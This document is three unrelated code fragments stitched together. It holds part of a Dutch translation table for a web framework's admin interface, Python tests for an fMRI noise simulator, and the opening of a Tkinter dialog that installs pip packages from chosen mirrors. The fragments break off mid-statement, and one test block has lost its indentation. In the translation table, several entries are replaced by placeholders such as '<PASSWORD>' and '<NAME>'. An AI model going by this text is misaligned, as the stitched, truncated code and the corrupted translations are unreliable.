'Delete:': 'Verwijder:',
'Demo': 'Demo',
'Deploy on Google App Engine': 'Deploy op Google App Engine',
'Deployment Recipes': 'Deployment Recepten',
'Description': 'Beschrijving',
'design': 'design',
'DESIGN': 'DESIGN',
'Design for': 'Design voor',
'DISK': 'DISK',
'Disk Cache Keys': 'Disk Cache Keys',
'Disk Cleared': 'Disk Geleegd',
'Documentation': 'Documentatie',
"Don't know what to do?": 'Weet je niet wat je moet doen?',
'done!': 'gereed!',
'Download': 'Download',
'E-mail': 'E-mail',
'E-mail invalid': 'E-mail ongeldig',
'edit': 'bewerk',
'EDIT': 'BEWERK',
'Edit': 'Bewerk',
'Edit application': 'Bewerk applicatie',
'edit controller': 'bewerk controller',
'Edit current record': 'Bewerk huidig record',
'Edit Profile': 'Bewerk Profiel',
'edit profile': 'bewerk profiel',
'Edit This App': 'Bewerk Deze App',
'Editing file': 'Bewerk bestand',
'Editing file "%s"': 'Bewerk bestand "%s"',
'Email and SMS': 'E-mail en SMS',
'enter a number between %(min)g and %(max)g': 'geef een getal tussen %(min)g en %(max)g',
'Enter an integer between %(min)g and %(max)g': 'Enter an integer between %(min)g and %(max)g',
'enter an integer between %(min)g and %(max)g': 'geef een integer tussen %(min)g en %(max)g',
'Error logs for "%(app)s"': 'Error logs voor "%(app)s"',
'errors': 'errors',
'Errors': 'Errors',
'Export': 'Export',
'export as csv file': 'exporteer als csv-bestand',
'exposes': 'stelt bloot',
'extends': 'extends',
'failed to reload module': 'niet gelukt om module te herladen',
'False': 'Onwaar',
'FAQ': 'FAQ',
'file "%(filename)s" created': 'bestand "%(filename)s" gemaakt',
'file "%(filename)s" deleted': 'bestand "%(filename)s" verwijderd',
'file "%(filename)s" uploaded': 'bestand "%(filename)s" geupload',
'file "%(filename)s" was not deleted': 'bestand "%(filename)s" was niet verwijderd',
'file "%s" of %s restored': 'bestand "%s" van %s hersteld',
'file changed on disk': 'bestand aangepast op schijf',
'file does not exist': 'bestand bestaat niet',
'file saved on %(time)s': 'bestand bewaard op %(time)s',
'file saved on %s': 'bestand bewaard op %s',
'First name': 'Voornaam',
'Forbidden': 'Verboden',
'Forms and Validators': 'Formulieren en Validators',
'Free Applications': 'Gratis Applicaties',
'Functions with no doctests will result in [passed] tests.': 'Functies zonder doctests zullen resulteren in [passed] tests.',
'Group %(group_id)s created': 'Groep %(group_id)s gemaakt',
'Group ID': 'Groep ID',
'Group uniquely assigned to user %(id)s': 'Groep is uniek toegekend aan gebruiker %(id)s',
'Groups': 'Groepen',
'Hello World': '<NAME>',
'help': 'help',
'Home': 'Home',
'How did you get here?': 'Hoe ben je hier gekomen?',
'htmledit': 'Bewerk HTML',
'import': 'import',
'Import/Export': 'Import/Export',
'includes': 'includes',
'Index': 'Index',
'insert new': 'voeg nieuwe',
'insert new %s': 'voeg nieuwe %s',
'Installed applications': 'Geïnstalleerde applicaties',
'internal error': 'interne error',
'Internal State': 'Interne State',
'Introduction': 'Introductie',
'Invalid action': 'Ongeldige actie',
'Invalid email': 'Ongeldig emailadres',
'invalid password': '<PASSWORD>',
'Invalid password': '<PASSWORD>',
'Invalid Query': 'Ongeldige Query',
'invalid request': 'ongeldige request',
'invalid ticket': 'ongeldige ticket',
'Is Active': 'Is Actief',
'Key': 'Key',
'language file "%(filename)s" created/updated': 'taalbestand "%(filename)s" gemaakt/geupdate',
'Language files (static strings) updated': 'Taalbestanden (statische strings) geupdate',
'languages': 'talen',
'Languages': 'Talen',
'languages updated': 'talen geupdate',
'Last name': 'Achternaam',
'Last saved on:': 'Laatst bewaard op:',
'Layout': 'Layout',
'Layout Plugins': 'Layout Plugins',
'Layouts': 'Layouts',
'License for': 'Licentie voor',
'Live Chat': 'Live Chat',
'loading...': 'laden...',
'Logged in': 'Ingelogd',
'Logged out': 'Uitgelogd',
'Login': 'Login',
'login': 'login',
'Login to the Administrative Interface': 'Inloggen op de Administratieve Interface',
'logout': 'logout',
'Logout': 'Logout',
'Lost Password': '<PASSWORD>',
'Lost password?': 'Wachtwoord kwijt?',
'Main Menu': 'Hoofdmenu',
'Manage Cache': 'Beheer Cache',
'Menu Model': 'Menu Model',
'merge': 'samenvoegen',
'Models': 'Modellen',
'models': 'modellen',
'Modified By': 'Aangepast Door',
'Modified On': 'Aangepast Op',
'Modules': 'Modules',
'modules': 'modules',
'My Sites': 'Mijn Sites',
'Name': 'Naam',
'New': 'Nieuw',
'new application "%s" created': 'nieuwe applicatie "%s" gemaakt',
'New password': '<PASSWORD>',
'New Record': 'Nieuw Record',
'new record inserted': 'nieuw record ingevoegd',
'next 100 rows': 'volgende 100 rijen',
'NO': 'NEE',
'No databases in this application': 'Geen database in deze applicatie',
'Object or table name': 'Object of tabelnaam',
'Old password': '<PASSWORD>',
'Online examples': 'Online voorbeelden',
'Or': 'Of',
'or import from csv file': 'of importeer van csv-bestand',
'or provide application url:': 'of geef een applicatie url:',
'Origin': 'Bron',
'Original/Translation': 'Oorspronkelijk/Vertaling',
'Other Plugins': 'Andere Plugins',
'Other Recipes': 'Andere Recepten',
'Overview': 'Overzicht',
'pack all': 'pack all',
'pack compiled': 'pack compiled',
'Password': '<PASSWORD>',
"Password fields don't match": 'Wachtwoordvelden komen niet overeen',
'Peeking at file': 'Naar bestand aan het gluren',
'please input your password again': 'geef alstublieft nogmaals uw wachtwoord',
'Plugins': 'Plugins',
'Powered by': 'Powered by',
'Preface': 'Inleiding',
'previous 100 rows': 'vorige 100 rijen',
'Profile': 'Profiel',
'Python': 'Python',
'Query': 'Query',
'Query:': 'Query:',
'Quick Examples': 'Snelle Voorbeelden',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Geleegd',
'Recipes': 'Recepten',
'Record': 'Record',
'record does not exist': 'record bestaat niet',
'Record ID': 'Record ID',
'Record id': 'Record id',
'register': 'registreer',
'Register': 'Registreer',
'Registration identifier': 'Registratie identifier',
'Registration key': 'Registratie sleutel',
'Registration successful': 'Registratie succesvol',
'Remember me (for 30 days)': 'Onthoudt mij (voor 30 dagen)',
'remove compiled': 'verwijder gecompileerde',
'Request reset password': '<PASSWORD>',
'Reset Password key': 'Reset Wachtwoord sleutel',
'Resolve Conflict file': 'Los Conflictbestand op',
'restore': 'herstel',
'revert': 'herstel',
'Role': 'Rol',
'Rows in Table': 'Rijen in tabel',
'Rows selected': 'Rijen geselecteerd',
'save': 'bewaar',
'Save profile': 'Bewaar profiel',
'Saved file hash:': 'Opgeslagen file hash:',
'Search': 'Zoek',
'Semantic': 'Semantisch',
'Services': 'Services',
'session expired': 'sessie verlopen',
'shell': 'shell',
'site': 'site',
'Size of cache:': 'Grootte van cache:',
'some files could not be removed': 'sommige bestanden konden niet worden verwijderd',
'starts with': 'begint met',
'state': 'state',
'static': 'statisch',
'Static files': 'Statische bestanden',
'Statistics': 'Statistieken',
'Stylesheet': 'Stylesheet',
'Submit': 'Submit',
'submit': 'submit',
'Support': 'Support',
'Sure you want to delete this object?': 'Weet je zeker dat je dit object wilt verwijderen?',
'Table': 'Tabel',
'Table name': 'Tabelnaam',
'test': 'test',
'Testing application': 'Applicatie testen',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'De "query" is een conditie zoals | |
signal_function = sim.convolve_hrf(stimfunction=stimfunction,
tr_duration=tr_duration,
)
# Convolve the HRF with the stimulus sequence
signal = sim.apply_signal(signal_function=signal_function,
volume_signal=volume,
)
# Generate the mask of the signal
mask, template = sim.mask_brain(signal,
mask_self=None)
assert min(mask[mask > 0]) > 0.1, "Mask thresholding did not work"
assert len(np.unique(template) > 2), "Template creation did not work"
stimfunction_tr = stimfunction[::int(tr_duration * 100)]
# Create the noise volumes (using the default parameters)
noise = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
iterations=[1, 0],
)
assert signal.shape == noise.shape, "The dimensions of signal and noise " \
"the same"
noise_high = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={'sfnr': 50, 'snr': 25},
iterations=[1, 0],
)
noise_low = sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={'sfnr': 100, 'snr': 25},
iterations=[1, 0],
)
system_high = np.std(noise_high[mask > 0], 1).mean()
system_low = np.std(noise_low[mask > 0], 1).mean()
assert system_low < system_high, "SFNR noise could not be manipulated"
# Check that you check for the appropriate template values
with pytest.raises(ValueError):
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template * 2,
mask=mask,
noise_dict={},
)
# Check that iterations does what it should
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={},
iterations=[0, 0],
)
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict={},
iterations=None,
)
# Test drift noise
trs = 1000
period = 100
drift = sim._generate_noise_temporal_drift(trs,
tr_duration,
'sine',
period,
)
# Check that the max frequency is the appropriate frequency
power = abs(np.fft.fft(drift))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / trs
period_freq = np.where(freq == 1 / (period // tr_duration))
max_freq = np.argmax(power)
assert period_freq == max_freq, 'Max frequency is not where it should be'
# Do the same but now with cosine basis functions, answer should be close
drift = sim._generate_noise_temporal_drift(trs,
tr_duration,
'discrete_cos',
period,
)
# Check that the appropriate frequency is peaky (may not be the max)
power = abs(np.fft.fft(drift))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / trs
period_freq = np.where(freq == 1 / (period // tr_duration))[0][0]
assert power[period_freq] > power[period_freq + 1], 'Power is low'
assert power[period_freq] > power[period_freq - 1], 'Power is low'
# Check it gives a warning if the duration is too short
drift = sim._generate_noise_temporal_drift(50,
tr_duration,
'discrete_cos',
period,
)
# Test physiological noise (using unrealistic parameters so that it's easy)
timepoints = list(np.linspace(0, (trs - 1) * tr_duration, trs))
resp_freq = 0.2
heart_freq = 1.17
phys = sim._generate_noise_temporal_phys(timepoints,
resp_freq,
heart_freq,
)
# Check that the max frequency is the appropriate frequency
power = abs(np.fft.fft(phys))[1:trs // 2]
freq = np.linspace(1, trs // 2 - 1, trs // 2 - 1) / (trs * tr_duration)
peaks = (power > (power.mean() + power.std())) # Where are the peaks
peak_freqs = freq[peaks]
assert np.any(resp_freq == peak_freqs), 'Resp frequency not found'
assert len(peak_freqs) == 2, 'Two peaks not found'
# Test task noise
sim._generate_noise_temporal_task(stimfunction_tr,
motion_noise='gaussian',
)
sim._generate_noise_temporal_task(stimfunction_tr,
motion_noise='rician',
)
# Test ARMA noise
with pytest.raises(ValueError):
noise_dict = {'fwhm': 4, 'auto_reg_rho': [1], 'ma_rho': [1, 1]}
sim._generate_noise_temporal_autoregression(stimfunction_tr,
noise_dict,
dimensions,
mask,
)
# Generate spatial noise
vol = sim._generate_noise_spatial(np.array([10, 10, 10, trs]))
assert len(vol.shape) == 3, 'Volume was not reshaped to ignore TRs'
# Switch some of the noise types on
noise_dict = dict(physiological_sigma=1, drift_sigma=1, task_sigma=1,
auto_reg_sigma=0)
sim.generate_noise(dimensions=dimensions,
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict=noise_dict,
iterations=[0, 0],
)
def test_generate_noise_spatial():
    """Spatial noise should be comparably smooth along x, y and z.

    Re-implements the final aggregation step of sim._calc_FHWM by hand and
    checks that the per-axis FWHM estimates vary by less than 25%.
    (Also removes a stray debug print of the FWHM vector that polluted
    test output.)
    """
    # Set up the inputs
    dimensions = np.array([10, 5, 10])
    mask = np.ones(dimensions)
    vol = sim._generate_noise_spatial(dimensions, mask)
    # Run the analysis from _calc_FHWM but for the last step of aggregating
    # across dimensions
    v_count = 0               # number of in-mask voxels
    v_sum = 0                 # running sum of voxel values
    v_sq = 0                  # running sum of squared voxel values
    d_sum = [0.0, 0.0, 0.0]   # per-axis sum of neighbor differences
    d_sq = [0.0, 0.0, 0.0]    # per-axis sum of squared neighbor differences
    d_count = [0, 0, 0]       # per-axis neighbor-pair counts
    # Pull out all the voxel coordinates
    coordinates = list(product(range(dimensions[0]),
                               range(dimensions[1]),
                               range(dimensions[2])))
    # Find the sum of squared error for the non-masked voxels in the brain
    for i in list(range(len(coordinates))):
        # Pull out this coordinate
        x, y, z = coordinates[i]
        # Is this within the mask?
        if mask[x, y, z] > 0:
            # Find the volume sum and squared values
            v_count += 1
            v_sum += vol[x, y, z]
            v_sq += vol[x, y, z] ** 2
    # Get the volume variance
    v_var = (v_sq - ((v_sum ** 2) / v_count)) / (v_count - 1)
    for i in list(range(len(coordinates))):
        # Pull out this coordinate
        x, y, z = coordinates[i]
        # Is this within the mask?
        if mask[x, y, z] > 0:
            # For each xyz dimension calculate the squared
            # difference of this voxel and the next
            in_range = (x < dimensions[0] - 1)
            in_mask = in_range and (mask[x + 1, y, z] > 0)
            included = in_mask and (~np.isnan(vol[x + 1, y, z]))
            if included:
                d_sum[0] += vol[x, y, z] - vol[x + 1, y, z]
                d_sq[0] += (vol[x, y, z] - vol[x + 1, y, z]) ** 2
                d_count[0] += 1
            in_range = (y < dimensions[1] - 1)
            in_mask = in_range and (mask[x, y + 1, z] > 0)
            included = in_mask and (~np.isnan(vol[x, y + 1, z]))
            if included:
                d_sum[1] += vol[x, y, z] - vol[x, y + 1, z]
                d_sq[1] += (vol[x, y, z] - vol[x, y + 1, z]) ** 2
                d_count[1] += 1
            in_range = (z < dimensions[2] - 1)
            in_mask = in_range and (mask[x, y, z + 1] > 0)
            included = in_mask and (~np.isnan(vol[x, y, z + 1]))
            if included:
                d_sum[2] += vol[x, y, z] - vol[x, y, z + 1]
                d_sq[2] += (vol[x, y, z] - vol[x, y, z + 1]) ** 2
                d_count[2] += 1
    # Find the variance of the neighbor differences per axis
    d_var = np.divide((d_sq - np.divide(np.power(d_sum, 2),
                                        d_count)), (np.add(d_count, -1)))
    # Convert the variance ratio into a Gaussian sigma^2, then into FWHM
    o_var = np.divide(-1, (4 * np.log(1 - (0.5 * d_var / v_var))))
    fwhm3 = np.sqrt(o_var) * 2 * np.sqrt(2 * np.log(2))
    # Calculate the proportion of std relative to the mean
    std_proportion = np.nanstd(fwhm3) / np.nanmean(fwhm3)
    assert std_proportion < 0.25, 'Variance is inconsistent across dim'
def test_mask_brain():
    """Exercise sim.mask_brain: masking a generated signal volume, the
    bundled default brain template, and self-masking a template."""
    # Inputs for generate_signal
    dimensions = np.array([10, 10, 10])  # What is the size of the brain
    feature_size = [2]
    feature_type = ['cube']
    feature_coordinates = np.array(
        [[4, 4, 4]])
    signal_magnitude = [30]
    # Generate a volume representing the location and quality of the signal
    volume = sim.generate_signal(dimensions=dimensions,
                                 feature_coordinates=feature_coordinates,
                                 feature_type=feature_type,
                                 feature_size=feature_size,
                                 signal_magnitude=signal_magnitude,
                                 )
    # Mask the volume to be the same shape as a brain
    mask, _ = sim.mask_brain(dimensions, mask_self=None,)
    brain = volume * mask
    # A centered cube should survive masking untouched
    assert np.sum(brain != 0) == np.sum(volume != 0), "Masking did not work"
    assert brain[0, 0, 0] == 0, "Masking did not work"
    assert brain[4, 4, 4] != 0, "Masking did not work"
    # A corner cube should be partially clipped by the brain mask
    feature_coordinates = np.array(
        [[1, 1, 1]])
    volume = sim.generate_signal(dimensions=dimensions,
                                 feature_coordinates=feature_coordinates,
                                 feature_type=feature_type,
                                 feature_size=feature_size,
                                 signal_magnitude=signal_magnitude,
                                 )
    # Mask the volume to be the same shape as a brain
    mask, _ = sim.mask_brain(dimensions, mask_self=None, )
    brain = volume * mask
    assert np.sum(brain != 0) < np.sum(volume != 0), "Masking did not work"
    # Test that you can load the default
    dimensions = np.array([100, 100, 100])
    mask, template = sim.mask_brain(dimensions, mask_self=False)
    assert mask[20, 80, 50] == 0, 'Masking didn''t work'
    assert mask[25, 80, 50] == 1, 'Masking didn''t work'
    assert int(template[25, 80, 50] * 100) == 57, 'Template not correct'
    # Check that you can mask self
    mask_self, template_self = sim.mask_brain(template, mask_self=True)
    assert (template_self - template).sum() < 1e2, 'Mask self error'
    assert (mask_self - mask).sum() == 0, 'Mask self error'
def test_calc_noise():
# Inputs for functions
onsets = [10, 30, 50, 70, 90]
event_durations = [6]
tr_duration = 2
duration = 200
temporal_res = 100
tr_number = int(np.floor(duration / tr_duration))
dimensions_tr = np.array([10, 10, 10, tr_number])
# Preset the noise dict
nd_orig = sim._noise_dict_update({})
# Create the time course for the signal to be generated
stimfunction = sim.generate_stimfunction(onsets=onsets,
event_durations=event_durations,
total_time=duration,
temporal_resolution=temporal_res,
)
# Mask the volume to be the same shape as a brain
mask, template = sim.mask_brain(dimensions_tr, mask_self=None)
stimfunction_tr = stimfunction[::int(tr_duration * temporal_res)]
nd_orig['matched'] = 0
noise = sim.generate_noise(dimensions=dimensions_tr[0:3],
stimfunction_tr=stimfunction_tr,
tr_duration=tr_duration,
template=template,
mask=mask,
noise_dict=nd_orig,
)
# Check the spatial noise match
nd_orig['matched'] | |
# -*- coding: utf-8 -*-
from noval import _,GetApp
from tkinter import ttk
from tkinter import messagebox,filedialog
import tkinter as tk
import noval.ui_base as ui_base
import noval.python.interpreter.interpretermanager as interpretermanager
import os
import subprocess
import noval.outputthread as outputthread
import threading
import noval.util.strutils as strutils
import noval.util.apputils as sysutils
import noval.util.utils as utils
import time
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import noval.consts as consts
import noval.ttkwidgets.treeviewframe as treeviewframe
import noval.editor.text as texteditor
import noval.util.urlutils as urlutils
import noval.python.parser.utils as parserutils
import noval.constants as constants
import noval.ttkwidgets.textframe as textframe
import noval.util.compat as compat
import noval.util.fileutils as fileutils
from dummy.userdb import UserDataDb
import noval.ui_utils as ui_utils
def url_parse_host(url):
    '''
    Extract the host (network location) component from a URL string.
    Returns an empty string when the URL carries no netloc.
    '''
    return urlparse(url).netloc
def get_package_versions(name):
    '''
    Query the NovalIDE server for the release versions of a package.
    Returns a sorted list of version strings, or an empty list when the
    package is unknown to the server.
    '''
    # Fetch info from novalide server
    api_addr = '%s/member/get_package' % (UserDataDb.HOST_SERVER_ADDR)
    data = utils.RequestData(api_addr, method='get', arg={'name': name})
    if data:
        return sorted(data['releases'])
    # The package could not be found on the server
    return []
class PackageActionChoiceDialog(ui_base.CommonModaldialog):
    '''
    Dialog shown when the package to install is already installed;
    offers the user a choice of actions (reinstall, update to the
    latest version, or update to a specific version).
    '''
    # Reinstall the currently installed version
    REINSTALL = 0
    # Update to the latest version
    UPDATE_LATEST = 1
    # Update to a user-specified version
    UPDATE_SPECIFIED = 2
    def __init__(self, master,pkg_name):
        ui_base.CommonModaldialog.__init__(self, master, takefocus=1)
        self.title(_("Package '%s' installed")%pkg_name)
        # Original comment said "forbid resizing the dialog"
        # NOTE(review): no resizable() call follows — confirm intent
        label_ctrl = ttk.Label(self.main_frame,text=_("Please choose the action you want:"))
        label_ctrl.pack(expand=1, fill="x",padx = consts.DEFAUT_CONTRL_PAD_X,pady = consts.DEFAUT_CONTRL_PAD_Y)
        self.choice_chkvar = tk.IntVar(value=self.UPDATE_LATEST)
        sizer_frame = ttk.Frame(self.main_frame)
        sizer_frame.pack(fill="x",padx=consts.DEFAUT_CONTRL_PAD_X)
        self.reinstall_radiobutton = ttk.Radiobutton( sizer_frame, text=_("Reinstall"),value = self.REINSTALL,variable=self.choice_chkvar)
        self.reinstall_radiobutton.pack(fill="x",pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
        self.update_latest_radiobutton = ttk.Radiobutton(sizer_frame, text=_("Update to latest version"),value = self.UPDATE_LATEST,variable=self.choice_chkvar)
        self.update_latest_radiobutton.pack(fill="x")
        self.update_specified_radiobutton = ttk.Radiobutton(sizer_frame, text=_("Update to specified version"),value = self.UPDATE_SPECIFIED,variable=self.choice_chkvar)
        self.update_specified_radiobutton.pack(fill="x")
        separator = ttk.Separator (self.main_frame, orient = tk.HORIZONTAL)
        separator.pack(expand=1, fill="x",padx=consts.DEFAUT_CONTRL_PAD_X,pady = (consts.DEFAUT_CONTRL_PAD_Y,0))
        self.AddokcancelButton()
class CommonManagePackagesDialog(ui_base.CommonModaldialog):
    '''
    Base dialog shared by the install and uninstall package dialogs:
    interpreter selection, pip argument entry, and a collapsible output
    area that streams the pip subprocess output.
    '''
    def __init__(self,parent,title,interpreter,interpreters,pkg_name,pkg_args='',autorun=False,call_back=None):
        '''
        Args:
            parent: parent Tk widget
            title: dialog window title
            interpreter: interpreter the package operation targets
            interpreters: list of available interpreters
            pkg_name: package name (may be empty; see GetPackageName)
            pkg_args: initial pip argument string
            autorun: start the operation automatically after the dialog opens
            call_back: callback invoked after the operation succeeds
        '''
        ui_base.CommonModaldialog.__init__(self,parent)
        self.title(title)
        # Interpreter the package operation targets
        # List of available interpreters
        self.interpreter = interpreter
        self.interpreters = interpreters
        # Package name
        self.pkg_name = pkg_name
        # pip argument string
        self.pkg_args = pkg_args
        # Whether to run automatically
        self.autorun = autorun
        # Callback executed after the operation completes
        self.end_callback = call_back
    def CreateWidgets(self,row_no,interpreter_lablel,pkg_args_label,extra_label):
        '''
        Build the shared widgets: interpreter combobox, argument entry
        with a Browse button, and the collapsible output area.
        Args:
            row_no: grid row index at which to start placing widgets
            interpreter_lablel: label text for the interpreter row
            pkg_args_label: label text above the arguments entry
            extra_label: help text shown above the output area
        '''
        row = ttk.Frame(self.main_frame)
        ttk.Label(row,text=interpreter_lablel).pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
        names = self.GetNames()
        self.interpreter_name_var = tk.StringVar(value=self.interpreter.Name)
        self._interpreterCombo = ttk.Combobox(row,values=names,textvariable=self.interpreter_name_var,state="readonly")
        self._interpreterCombo.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1,padx=(consts.DEFAUT_CONTRL_PAD_X,0))
        row.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
        row_no += 1
        label_1 = ttk.Label(self.main_frame, text=pkg_args_label)
        label_1.grid(row=row_no,column=0,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
        row_no += 1
        row = ttk.Frame(self.main_frame)
        self.args_var = tk.StringVar(value=self.pkg_args)
        self.args_ctrl = ttk.Entry(row,textvariable=self.args_var)
        self.args_ctrl.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),fill="x",expand=1)
        self.args_ctrl.bind("<Return>", self._ok, False)
        self.browser_btn = ttk.Button(row, text=_("Browse..."),command=self.BrowsePath)
        self.browser_btn.pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
        row.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
        row_no += 1
        label_2 = ttk.Label(self.main_frame, text=extra_label)
        label_2.grid(row=row_no,column=0,pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.EW)
        row_no += 1
        self.text_frame = textframe.TextFrame(self.main_frame,borderwidth=1,relief="solid",text_class=texteditor.TextCtrl)
        self.output_ctrl = self.text_frame.text
        # Current-line highlighting must be disabled here, otherwise an
        # exception is raised when the installation is cancelled
        self.output_ctrl.SetTagCurrentLine(False)
        self.output_ctrl['state'] = tk.DISABLED
        self.detail_output_row = row_no
        self.text_frame.grid(row=row_no,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.NSEW)
        row_no += 1
        self.bottom_frame = ttk.Frame(self.main_frame)
        self.detail_btn = ttk.Button(self.bottom_frame, text=_("Show Details") + "↓",command=self.ShowHideDetails)
        self.detail_btn.pack(side=tk.LEFT,pady=consts.DEFAUT_CONTRL_PAD_Y,padx=consts.DEFAUT_CONTRL_PAD_X)
        self._show_details = False
        self.AddokcancelButton()
        self.bottom_frame.grid(row=row_no,column=0,sticky=tk.NSEW)
        self.columnconfigure(0, weight=1)
        self.main_frame.columnconfigure(0, weight=1)
        self.ShowHideDetails()
    def ShowHideDetails(self):
        '''
        Toggle the visibility of the output area.
        NOTE(review): the flag reads inverted — after this method runs,
        _show_details is True while the pane is *hidden* (it records that
        the button now offers "Show Details").
        '''
        if not self._show_details:
            self.detail_btn.configure( text=_("Show Details") + "↓")
            self.text_frame.grid_forget()
            self._show_details = True
        else:
            self.text_frame.grid(row=self.detail_output_row,column=0,padx=consts.DEFAUT_CONTRL_PAD_X,sticky=tk.NSEW)
            self.detail_btn.configure( text=_("Hide Details") + "↑")
            self._show_details = False
    def BrowsePath(self):
        '''
        Ask the user for a requirements.txt file and derive pip args from it.
        '''
        descrs = [(_("Text File"),".txt"),]
        title = _("Choose requirements.txt")
        path = filedialog.askopenfilename(master=self,title=title ,
                       filetypes = descrs,
                       initialfile= "requirements.txt"
                )
        if not path:
            return
        self.GetInterpreter()
        self.SetRequirementsArgs(path)
    def SetRequirementsArgs(self,path):
        '''Hook: derive pip args from a requirements.txt path; overridden in subclasses.'''
    def AddokcancelButton(self):
        '''Place the OK/Cancel buttons inside the bottom frame.'''
        button_frame = ttk.Frame(self.bottom_frame)
        button_frame.pack(padx=(consts.DEFAUT_CONTRL_PAD_X,0),fill="x",pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
        self.AppendokcancelButton(button_frame)
    def ExecCommandAndOutput(self,command,dlg):
        '''
        Run the pip command, stream its stdout/stderr to the dialog, and
        finish via EndDialog with the process return code.
        '''
        #shell must be True on linux
        p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
        stdout_thread = outputthread.OutputThread(p.stdout,p,dlg,call_after=True)
        stdout_thread.start()
        stderr_thread = outputthread.OutputThread(p.stderr,p,dlg,call_after=True)
        stderr_thread.start()
        p.wait()
        self.EndDialog(p.returncode)
    # The dialog may already be closed while worker threads still touch its
    # widgets, so Tcl errors are caught uniformly here
    @ui_utils.capture_tclerror
    def AppendText(self,content):
        '''Append subprocess output to the read-only output control.'''
        self.output_ctrl['state'] = tk.NORMAL
        self.output_ctrl.set_read_only(False)
        if utils.is_py3_plus():
            content = compat.ensure_string(content)
        self.output_ctrl.insert(tk.END,content)
        self.output_ctrl.set_read_only(True)
        self.output_ctrl['state'] = tk.DISABLED
    def GetNames(self):
        '''Return the display names of all available interpreters.'''
        names = []
        for interpreter in self.interpreters:
            names.append(interpreter.Name)
        return names
    def GetInterpreter(self):
        '''Set self.interpreter from the current combobox selection.'''
        sel = self._interpreterCombo.current()
        self.interpreter = self.interpreters[sel]
    def _ok(self,event=None):
        '''
        Validate input and the selected interpreter; disable the controls
        on success. Returns True when the operation may proceed.
        '''
        if self.args_var.get().strip() == "":
            messagebox.showinfo(GetApp().GetAppName(),_("package name is empty"))
            return False
        self.GetInterpreter()
        if self.interpreter.IsBuiltIn or self.interpreter.GetPipPath() is None:
            messagebox.showerror(GetApp().GetAppName(),_("Could not find pip on the path"))
            return False
        self.EnableButton(enable=False)
        return True
    def EnableButton(self,enable=True):
        '''Enable/disable the argument entry and the OK button together.'''
        if enable:
            self.args_ctrl['state'] = tk.NORMAL
            self.ok_button['state'] = tk.NORMAL
        else:
            self.args_ctrl['state'] = tk.DISABLED
            self.ok_button['state'] = tk.DISABLED
    def run(self):
        '''Hook: start the actual package operation; overridden in subclasses.'''
        pass
    def auto_run(self):
        '''Trigger the operation immediately when autorun was requested.'''
        if not self.autorun:
            return
        self._ok()
    def GetPackageName(self):
        '''Return the package name, falling back to the typed arguments.'''
        # Package name is empty: check whether the typed arguments are
        # themselves a bare package name
        pkg_name = self.pkg_name
        if not pkg_name:
            args_name = self.args_var.get().strip()
            # If the input contains no space, treat it as a package name
            if args_name.find(" ") == -1:
                pkg_name = args_name
        return pkg_name
class InstallPackagesDialog(CommonManagePackagesDialog):
    '''Dialog to install pip packages, with a selectable PyPI mirror.'''
    # Known pip index mirrors, aligned index-for-index with SOURCE_NAME_LIST
    SOURCE_LIST = [
        "https://pypi.org/simple",
        "https://pypi.tuna.tsinghua.edu.cn/simple",
        "http://mirrors.aliyun.com/pypi/simple",
        "https://pypi.mirrors.ustc.edu.cn/simple",
        "http://pypi.hustunique.com",
        "http://pypi.sdutlinux.org",
        "http://pypi.douban.com/simple"
    ]
    # Class-level cache of the fastest responding mirror (set by GetBestPipSource)
    BEST_PIP_SOURCE = None
    def __init__(self,parent,interpreter,interpreters=interpretermanager.InterpreterManager().interpreters,pkg_name='',install_args='',autorun=False,install_update=False,call_back=None):
        '''
        NOTE(review): the `interpreters` default is evaluated once at class
        definition time (mutable default argument) — confirm that
        InterpreterManager is a singleton whose interpreter list stays current.
        '''
        CommonManagePackagesDialog.__init__(self,parent,_("Install Package"),interpreter,interpreters,pkg_name,install_args,autorun,call_back)
        self.SOURCE_NAME_LIST = [
            _('Default Source'),
            _('Tsinghua'),
            _('Aliyun'),
            _('USTC'),
            _('HUST'),
            _('SDUT'),
            _('Douban'),
        ]
        # Whether this operation is an update rather than a fresh install
        self.install_update = install_update
        row = ttk.Frame(self.main_frame)
        ttk.Label(row,text=_("We will use the pip source:")).pack(side=tk.LEFT,pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
